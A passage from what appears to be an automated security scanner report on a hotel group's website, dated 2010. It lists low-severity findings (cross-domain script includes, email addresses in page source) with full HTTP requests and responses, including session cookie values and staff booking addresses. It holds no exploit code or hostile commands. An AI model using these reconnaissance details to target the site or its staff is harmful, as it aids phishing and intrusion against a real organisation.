Content-Type: text/html; charset=UTF-8
Content-Length: 24084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Useful Links - Red Carnation Ho
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.94. http://www.redcarnationhotels.com/useful-links/useful-travel-links_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /useful-links/useful-travel-links_1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /useful-links/useful-travel-links_1 HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Useful Travel Links - Red Carna
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.95. http://www.redcarnationhotels.com/usvirginatlantic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /usvirginatlantic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /usvirginatlantic HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:12 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:12 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Virgin Atlantic USA</title>
<me
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.96. http://www.redcarnationhotels.com/wellness  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /wellness

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wellness HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=d4906781592e1e5b19d7a052608c179a;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:50 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=8103ef1c266dc5bf10402082bca4acc4; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Spa Hotels, UK, London,
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.97. http://www.redcarnationhotels.com/what-is-rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /what-is-rss

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /what-is-rss HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:57:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:57:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Red Carnation Hotels, RSS</titl
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.98. http://www.redcarnationhotels.com/your-stay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-stay HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:31:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:31:02 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=a046d59539af2a88b9e0057f3dbee706; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.99. http://www.redcarnationhotels.com/your-stay/business-pleasure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/business-pleasure

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-stay/business-pleasure HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:46:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:46:02 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Business or Pleasure - Boutique
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.100. http://www.redcarnationhotels.com/your-stay/family  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/family

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-stay/family HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:48:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:01 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>5 Star Luxury Child and Family
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.101. http://www.redcarnationhotels.com/your-stay/female-traveller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/female-traveller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-stay/female-traveller HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:47:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:47:50 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Female Friendly Hotels - Red Ca
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.102. http://www.redcarnationhotels.com/your-stay/pets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/pets

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-stay/pets HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:48:03 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:03 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Pet and Dog Friendly Hot
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.103. http://www.redcarnationhotels.com/your-stay/rch-video-tour  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/rch-video-tour

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-stay/rch-video-tour HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:45:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:45:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>RCH Video Tour</title>
<meta ht
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.104. http://www.redcarnationhotels.com/your-stay/thoughtul-touches  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/thoughtul-touches

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-stay/thoughtul-touches HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:45:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:45:51 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Thoughtful Touches - Boutique H
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
6. Email addresses disclosed  previous
There are 104 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

6.1. http://www.redcarnationhotels.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.milestonehotel.com/contact-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:20:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:20:50 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=05996081970c883254084bbef9c977de; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 29425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Hotels, 5 Star Hotels, B
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.2. http://www.redcarnationhotels.com/african-pride  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /african-pride

Issue detail

The following email addresses were disclosed in the response:

Request

GET /african-pride HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/african-pride/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:46 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>African Pride VIP Treatment -
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
<br />
E: bookms@rchmail.com <br />
...[SNIP]...
<br />
E: bookeg@rchmail.com </p>
...[SNIP]...
<br />
E: book41@rchmail.com</div>
...[SNIP]...
<br />
E: bookrb@rchmail.com </p>
...[SNIP]...
<br />
E: bookch@rchmail.com <br />
...[SNIP]...
<br />
E: bookmt@rchmail.com <br />
...[SNIP]...
<br />
E: infosl@rchmail.com <br />
...[SNIP]...
<br />
E: ogh@theoghhotel.com<br />
...[SNIP]...
6.3. http://www.redcarnationhotels.com/african-pride/terms-and-conditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /african-pride/terms-and-conditions

Issue detail

The following email address was disclosed in the response:

Request

GET /african-pride/terms-and-conditions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/african-pride/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:44:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:44:13 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terms and Conditions</title>
<m
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.4. http://www.redcarnationhotels.com/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers

Issue detail

The following email address was disclosed in the response:

Request

GET /careers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:33 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=05f8c07acc9a296160e78cdf96650b67; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Hotel & Hospitality Careers - L
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.5. http://www.redcarnationhotels.com/careers/awards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/awards

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/awards HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:40:28 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:40:28 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Awards and Accolades - Red Carn
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.6. http://www.redcarnationhotels.com/careers/fraudulent-emails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/fraudulent-emails

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/fraudulent-emails HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Please be aware of fraudulent e
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
